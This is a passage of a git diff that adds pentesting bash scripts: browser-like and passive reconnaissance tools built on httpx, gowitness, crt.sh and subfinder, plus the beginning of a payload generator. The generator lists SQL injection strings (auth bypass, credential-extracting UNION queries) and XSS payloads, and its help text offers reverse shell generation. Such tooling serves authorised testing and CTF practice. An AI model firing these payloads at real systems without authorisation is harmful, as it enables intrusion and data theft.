echo "Run 'dvwa --help' for usage"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
233
scripts/pentesting/light-recon
Executable file
233
scripts/pentesting/light-recon
Executable file
|
|
@ -0,0 +1,233 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: light-recon
|
||||
# Description: Light web reconnaissance (browser-like, low detectability)
|
||||
# Usage: light-recon <url>
|
||||
# Tier 2: Between passive and active - mimics normal browsing
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}light-recon${NC} - Light Web Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " light-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Browser-like reconnaissance with low detectability"
|
||||
echo " Creates tmux window with 3 panes:"
|
||||
echo " - Pane 1 (left): httpx (HTTP probing with tech detection)"
|
||||
echo " - Pane 2 (top-right): gowitness (visual screenshots)"
|
||||
echo " - Pane 3 (bottom-right): results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}WHAT IS LIGHT RECON?${NC}"
|
||||
echo " ✓ HTTP/HTTPS probing (looks like normal browser request)"
|
||||
echo " ✓ Screenshot capture (headless browser)"
|
||||
echo " ✓ Technology fingerprinting (Wappalyzer-style)"
|
||||
echo " ✓ Security headers analysis"
|
||||
echo " ✓ SSL/TLS information"
|
||||
echo " ✓ Redirect chain following"
|
||||
echo
|
||||
echo " ✗ No directory brute-forcing"
|
||||
echo " ✗ No vulnerability scanning"
|
||||
echo " ✗ No aggressive crawling"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " light-recon http://target.htb"
|
||||
echo " light-recon https://example.com"
|
||||
echo " light-recon 10.10.10.5"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./light-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}DETECTABILITY:${NC}"
|
||||
echo " 🟡 Low - Appears as normal browser traffic"
|
||||
echo " Safe for bug bounty initial recon phase"
|
||||
echo " Use before aggressive scanning (web-recon)"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Light recon tools (all optional but warn)
|
||||
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||
command -v gowitness &>/dev/null || optional_missing+=("gowitness")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||
gowitness) echo " go install github.com/sensepost/gowitness@latest" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="light-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
mkdir -p "$OUTPUT_DIR/screenshots"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main light-recon function
|
||||
run_light_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Light Web Reconnaissance (Browser-Like) ║"
|
||||
echo "║ Target: $url"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window with 3 panes
|
||||
WINDOW_NAME="--> Light: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Create layout: [Left wide] [Right split top/bottom]
|
||||
# With 3 panes, tmux uses different numbering than 4-pane layouts
|
||||
# After splits: [0: left-wide] [1: top-right] [2: bottom-right]
|
||||
|
||||
# Split horizontally (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split right pane vertically
|
||||
tmux select-pane -t 1
|
||||
tmux split-window -v
|
||||
|
||||
# Resize left pane to be wider (60/40 split)
|
||||
tmux select-pane -t 0
|
||||
tmux resize-pane -R 30
|
||||
|
||||
# Final 3-pane layout:
|
||||
# 0 (left-wide) 1 (top-right)
|
||||
# 2 (bottom-right)
|
||||
|
||||
# Pane 0 (left): httpx - comprehensive HTTP probing
|
||||
tmux select-pane -t 0
|
||||
if command -v httpx &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting httpx HTTP probing...${NC}' && echo '$url' | httpx -silent -title -tech-detect -status-code -content-length -web-server -method -ip -cname -cdn -follow-redirects -tls-probe -pipeline -json -o httpx-detailed.json 2>&1 | tee httpx.log && echo '$url' | httpx -silent -sc -title -tech-detect -web-server -ip -location -cdn -o httpx-summary.txt && echo -e '${GREEN}✓ httpx complete${NC}' && echo && echo -e '${CYAN}Summary:${NC}' && cat httpx-summary.txt" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 1 (top-right): gowitness - screenshot capture
|
||||
tmux select-pane -t 1
|
||||
if command -v gowitness &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting gowitness screenshot capture...${NC}' && gowitness single '$url' --screenshot-path=./screenshots/ --disable-logging --timeout 30 2>&1 | tee gowitness.log && echo -e '${GREEN}✓ gowitness complete${NC}' && echo && ls -lh screenshots/ | tail -5" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ gowitness not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 2
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIGHT RECON RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}HTTP Probing (httpx):${NC}'; [ -f httpx-summary.txt ] && [ -s httpx-summary.txt ] && cat httpx-summary.txt || echo ' Waiting...'; echo; echo -e '${GREEN}Screenshots (gowitness):${NC}'; [ -d screenshots ] && SCREENSHOT_COUNT=\$(ls -1 screenshots/*.png 2>/dev/null | wc -l) && echo \" Captured: \$SCREENSHOT_COUNT screenshot(s)\" && ls -1 screenshots/*.png 2>/dev/null | head -3 || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Detection:${NC}'; [ -f httpx-detailed.json ] && [ -s httpx-detailed.json ] && jq -r '.tech[]' httpx-detailed.json 2>/dev/null | sort -u | sed 's/^/ - /' | head -10 || echo ' Waiting...'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 5; done" C-m
|
||||
|
||||
# Focus back on httpx pane
|
||||
tmux select-pane -t 0
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux light-recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Light: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Light recon appears as normal browser traffic"
|
||||
echo -e "${YELLOW}Note:${NC} Screenshots saved to screenshots/ subdirectory"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running httpx...${NC}"
|
||||
if command -v httpx &>/dev/null; then
|
||||
echo "$url" | httpx -silent -title -tech-detect -status-code -web-server -ip -o httpx-summary.txt
|
||||
cat httpx-summary.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running gowitness...${NC}"
|
||||
if command -v gowitness &>/dev/null; then
|
||||
gowitness single "$url" --screenshot-path=./screenshots/ --disable-logging --timeout 30
|
||||
ls -lh screenshots/
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Light recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: light-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run light reconnaissance
|
||||
run_light_recon "$url"
|
||||
273
scripts/pentesting/passive-recon
Executable file
273
scripts/pentesting/passive-recon
Executable file
|
|
@ -0,0 +1,273 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: passive-recon
|
||||
# Description: Truly passive reconnaissance (no direct target contact)
|
||||
# Usage: passive-recon <domain>
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}passive-recon${NC} - Truly Passive Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " passive-recon <domain>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Performs 100% PASSIVE reconnaissance with ZERO target contact"
|
||||
echo " All data gathered from third-party sources (DNS, certs, archives)"
|
||||
echo
|
||||
echo -e "${BOLD}WHAT IS PASSIVE?${NC}"
|
||||
echo " ✓ DNS lookups (public records)"
|
||||
echo " ✓ Certificate transparency logs"
|
||||
echo " ✓ Wayback Machine archives"
|
||||
echo " ✓ WHOIS lookups"
|
||||
echo " ✓ Shodan/censys (if API keys configured)"
|
||||
echo " ✓ GitHub dorking"
|
||||
echo " ✓ Subfinder/amass (passive mode)"
|
||||
echo
|
||||
echo " ✗ Port scanning (sends packets)"
|
||||
echo " ✗ Directory brute-forcing (sends HTTP requests)"
|
||||
echo " ✗ Web crawling (touches target)"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " passive-recon example.com"
|
||||
echo " passive-recon target.htb"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./passive-recon-<domain>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}WHY PASSIVE?${NC}"
|
||||
echo " • Undetectable (no IDS/IPS alerts)"
|
||||
echo " • Safe for bug bounty recon phase"
|
||||
echo " • Legal (public information only)"
|
||||
echo " • Fast (no rate limiting)"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
command -v dig &>/dev/null || missing+=("dig")
|
||||
command -v whois &>/dev/null || missing+=("whois")
|
||||
command -v curl &>/dev/null || missing+=("curl")
|
||||
command -v jq &>/dev/null || missing+=("jq")
|
||||
|
||||
# Optional tools (all passive)
|
||||
command -v subfinder &>/dev/null || optional_missing+=("subfinder")
|
||||
command -v amass &>/dev/null || optional_missing+=("amass")
|
||||
command -v waybackurls &>/dev/null || optional_missing+=("waybackurls")
|
||||
command -v gau &>/dev/null || optional_missing+=("gau")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (some scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
subfinder) echo " go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" ;;
|
||||
amass) echo " go install -v github.com/owasp-amass/amass/v4/...@master" ;;
|
||||
waybackurls) echo " go install github.com/tomnomnom/waybackurls@latest" ;;
|
||||
gau) echo " go install github.com/lc/gau/v2/cmd/gau@latest" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local domain="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_domain=$(echo "$domain" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="passive-recon-${clean_domain}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Check if target is localhost
|
||||
check_localhost() {
|
||||
local domain="$1"
|
||||
|
||||
if [[ "$domain" =~ ^(localhost|127\\.0\\.0\\.1|0\\.0\\.0\\.0|::1)$ ]]; then
|
||||
return 0 # Is localhost
|
||||
fi
|
||||
return 1 # Not localhost
|
||||
}
|
||||
|
||||
# Main passive-recon function
|
||||
run_passive_recon() {
|
||||
local domain="$1"
|
||||
|
||||
# Strip http:// if provided
|
||||
domain=$(echo "$domain" | sed 's~https\?://~~g' | sed 's~/.*~~g')
|
||||
|
||||
# Check if target is localhost
|
||||
if check_localhost "$domain"; then
|
||||
echo -e "${RED}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ ⚠️ LOCALHOST DETECTED ⚠️ ║"
|
||||
echo "║ ║"
|
||||
echo "║ Passive recon doesn't work on localhost! ║"
|
||||
echo "║ No DNS records, certificates, or wayback data exists. ║"
|
||||
echo "║ ║"
|
||||
echo "║ Use instead: ║"
|
||||
echo "║ web-recon http://localhost:PORT ║"
|
||||
echo "║ web-attack http://localhost:PORT ║"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Passive Reconnaissance (Zero Target Contact) ║"
|
||||
echo "║ Domain: $domain"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$domain"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$domain"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window with 4 panes
|
||||
tmux new-window -n "--> Passive: ${domain:0:15}... <--"
|
||||
|
||||
# Split into 4 panes (2x2 grid)
|
||||
# CRITICAL: Tmux renumbers panes during splits
|
||||
# After all splits complete, panes are numbered: 1, 2, 3, 4 (NOT 0, 1, 2, 3)
|
||||
# [1: DNS/WHOIS] [2: Cert Transparency]
|
||||
# [3: Wayback] [4: Subdomain Enum ]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
tmux split-window -h
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final pane layout after tmux renumbering: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
|
||||
# Pane 1 (top-left): DNS enumeration and WHOIS
|
||||
tmux select-pane -t 1
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} DNS & WHOIS lookup...${NC}' && dig '$domain' ANY +noall +answer | tee dns.txt && echo && whois '$domain' | tee whois.txt && echo -e '${GREEN}✓ DNS/WHOIS complete${NC}'" C-m
|
||||
|
||||
# Pane 2 (top-right): Certificate Transparency logs
|
||||
tmux select-pane -t 2
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Certificate Transparency logs...${NC}' && curl -s 'https://crt.sh/?q=%.$domain&output=json' | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt && echo -e '${GREEN}✓ Cert transparency complete${NC}'" C-m
|
||||
|
||||
# Pane 3 (bottom-left): Wayback Machine / historical URLs
|
||||
tmux select-pane -t 3
|
||||
if command -v waybackurls &>/dev/null || command -v gau &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Wayback Machine historical URLs...${NC}' && (waybackurls '$domain' 2>/dev/null || gau '$domain' 2>/dev/null || echo 'No wayback tool available') | tee wayback-urls.txt && cat wayback-urls.txt | unfurl -u paths 2>/dev/null | sort -u | tee wayback-paths.txt || true && echo -e '${GREEN}✓ Wayback complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ waybackurls/gau not installed${NC}' && echo '# Install: go install github.com/tomnomnom/waybackurls@latest' && touch wayback-urls.txt" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Subdomain enumeration (passive only)
|
||||
tmux select-pane -t 4
|
||||
if command -v subfinder &>/dev/null || command -v amass &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Passive subdomain enumeration...${NC}' && (subfinder -d '$domain' -silent 2>/dev/null || amass enum -passive -d '$domain' 2>/dev/null || echo 'No subdomain tool available') | tee subdomains-enum.txt && cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt && echo -e '${GREEN}✓ Subdomain enum complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ subfinder/amass not installed${NC}' && echo '# Install: go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest' && touch subdomains-enum.txt all-subdomains.txt" C-m
|
||||
fi
|
||||
|
||||
# Focus back on DNS pane
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux passive-recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Passive: ${domain:0:15}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${MAGENTA}Note:${NC} 100% passive - no packets sent to target"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local domain="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running DNS & WHOIS...${NC}"
|
||||
dig "$domain" ANY +noall +answer | tee dns.txt
|
||||
whois "$domain" | tee whois.txt
|
||||
|
||||
echo -e "\n${GREENSTAR} Certificate Transparency...${NC}"
|
||||
curl -s "https://crt.sh/?q=%.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt
|
||||
|
||||
echo -e "\n${GREENSTAR} Wayback Machine...${NC}"
|
||||
if command -v waybackurls &>/dev/null; then
|
||||
waybackurls "$domain" | tee wayback-urls.txt
|
||||
elif command -v gau &>/dev/null; then
|
||||
gau "$domain" | tee wayback-urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Subdomain enumeration (passive)...${NC}"
|
||||
if command -v subfinder &>/dev/null; then
|
||||
subfinder -d "$domain" -silent | tee subdomains-enum.txt
|
||||
elif command -v amass &>/dev/null; then
|
||||
amass enum -passive -d "$domain" | tee subdomains-enum.txt
|
||||
fi
|
||||
|
||||
cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Passive recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
domain="$1"
|
||||
|
||||
# Validate domain
|
||||
if [[ -z "$domain" ]]; then
|
||||
echo -e "${RED}Error:${NC} Domain required"
|
||||
echo "Usage: passive-recon <domain>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run passive reconnaissance
|
||||
run_passive_recon "$domain"
|
||||
517
scripts/pentesting/payload
Executable file
517
scripts/pentesting/payload
Executable file
|
|
@ -0,0 +1,517 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: payload
|
||||
# Description: Security payload generator with encoding and obfuscation
|
||||
# Usage: payload list # List payload types
|
||||
# payload sql basic # Generate basic SQL injection payloads
|
||||
# payload xss reflected # Generate reflected XSS payloads
|
||||
# payload cmd linux # Generate Linux command injection payloads
|
||||
# payload shell reverse 10.0.0.1 # Generate reverse shell payloads
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}payload${NC} - Security Payload Generator v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " payload <TYPE> <VARIANT> [OPTIONS]"
|
||||
echo
|
||||
echo -e "${BOLD}TYPES:${NC}"
|
||||
echo -e " ${CYAN}sql${NC} SQL injection payloads"
|
||||
echo -e " ${CYAN}xss${NC} Cross-site scripting payloads"
|
||||
echo -e " ${CYAN}cmd${NC} Command injection payloads"
|
||||
echo -e " ${CYAN}shell${NC} Reverse/bind shell payloads"
|
||||
echo -e " ${CYAN}lfi${NC} Local file inclusion payloads"
|
||||
echo -e " ${CYAN}xxe${NC} XML external entity payloads"
|
||||
echo -e " ${CYAN}ssti${NC} Server-side template injection"
|
||||
echo -e " ${CYAN}list${NC} List all available payloads"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " payload list"
|
||||
echo " payload sql basic"
|
||||
echo " payload xss reflected"
|
||||
echo " payload cmd linux"
|
||||
echo " payload shell reverse 10.10.14.5 4444"
|
||||
echo " payload lfi linux"
|
||||
echo " payload xxe basic"
|
||||
echo
|
||||
echo -e "${BOLD}OPTIONS:${NC}"
|
||||
echo -e " ${CYAN}-e, --encode${NC} Encode payloads (base64, url, hex)"
|
||||
echo -e " ${CYAN}-o, --output${NC} Output to file"
|
||||
echo -e " ${CYAN}-c, --copy${NC} Copy to clipboard"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||
}
|
||||
|
||||
# Clipboard helper
|
||||
clip_set() {
|
||||
if command -v xsel &>/dev/null; then
|
||||
xsel --input --clipboard
|
||||
elif command -v xclip &>/dev/null; then
|
||||
xclip -selection clipboard
|
||||
elif command -v pbcopy &>/dev/null; then
|
||||
pbcopy
|
||||
fi
|
||||
}
|
||||
|
||||
# SQL Injection Payloads
|
||||
generate_sql() {
|
||||
local variant="${1:-basic}"
|
||||
|
||||
case "$variant" in
|
||||
basic)
|
||||
cat << 'EOF'
|
||||
# Basic SQL Injection
|
||||
' OR '1'='1
|
||||
' OR '1'='1' --
|
||||
' OR '1'='1' /*
|
||||
admin' --
|
||||
admin' #
|
||||
' OR 1=1--
|
||||
' OR 1=1#
|
||||
' OR 1=1/*
|
||||
') OR '1'='1--
|
||||
') OR ('1'='1--
|
||||
|
||||
# Union-based
|
||||
' UNION SELECT NULL--
|
||||
' UNION SELECT NULL,NULL--
|
||||
' UNION SELECT NULL,NULL,NULL--
|
||||
|
||||
# Error-based
|
||||
' AND 1=CONVERT(int,(SELECT @@version))--
|
||||
' AND 1=CAST((SELECT @@version) AS int)--
|
||||
|
||||
# Time-based blind
|
||||
'; WAITFOR DELAY '0:0:5'--
|
||||
'; SELECT SLEEP(5)--
|
||||
' AND SLEEP(5)--
|
||||
EOF
|
||||
;;
|
||||
auth-bypass)
|
||||
cat << 'EOF'
|
||||
# Authentication Bypass
|
||||
admin' OR '1'='1
|
||||
admin' OR 1=1--
|
||||
' OR 'a'='a
|
||||
' OR 1=1 LIMIT 1--
|
||||
admin'/*
|
||||
' OR '1'='1'--
|
||||
' OR '1'='1'#
|
||||
' OR '1'='1'/*
|
||||
') OR ('1'='1
|
||||
admin') OR ('1'='1
|
||||
admin') OR '1'='1'--
|
||||
EOF
|
||||
;;
|
||||
union)
|
||||
cat << 'EOF'
|
||||
# UNION-based SQL Injection
|
||||
' UNION SELECT NULL--
|
||||
' UNION SELECT NULL,NULL--
|
||||
' UNION SELECT NULL,NULL,NULL--
|
||||
' UNION SELECT NULL,NULL,NULL,NULL--
|
||||
' UNION SELECT 1,2,3--
|
||||
' UNION SELECT username,password FROM users--
|
||||
' UNION ALL SELECT NULL--
|
||||
' UNION ALL SELECT NULL,NULL--
|
||||
-1' UNION SELECT NULL--
|
||||
EOF
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Unknown SQL variant:${NC} $variant"
|
||||
echo "Available: basic, auth-bypass, union"
|
||||
return 1
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# XSS Payloads
|
||||
generate_xss() {
|
||||
local variant="${1:-basic}"
|
||||
|
||||
case "$variant" in
|
||||
basic|reflected)
|
||||
cat << 'EOF'
|
||||
# Basic XSS
|
||||
<script>alert(1)</script>
|
||||
<script>alert('XSS')</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
<img src=x onerror=alert(1)>
|
||||
<svg onload=alert(1)>
|
||||
<body onload=alert(1)>
|
||||
<iframe src="javascript:alert(1)">
|
||||
<input autofocus onfocus=alert(1)>
|
||||
<select autofocus onfocus=alert(1)>
|
||||
<textarea autofocus onfocus=alert(1)>
|
||||
<keygen autofocus onfocus=alert(1)>
|
||||
<video><source onerror="alert(1)">
|
||||
<audio src=x onerror=alert(1)>
|
||||
|
||||
# Event handlers
|
||||
<div onmouseover=alert(1)>hover</div>
|
||||
<marquee onstart=alert(1)>
|
||||
<details open ontoggle=alert(1)>
|
||||
|
||||
# Breaking out of attributes
|
||||
"><script>alert(1)</script>
|
||||
